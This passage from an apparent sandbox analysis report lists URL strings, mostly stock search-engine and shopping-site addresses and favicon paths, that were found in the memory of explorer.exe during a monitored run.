Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000008.00000000.2172365601.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2184480582.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000008.00000000.2172040341.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.2184480582.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000008.00000000.2162967936.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2172040341.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2172040341.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2168462228.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2178982212.00000000085C0000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
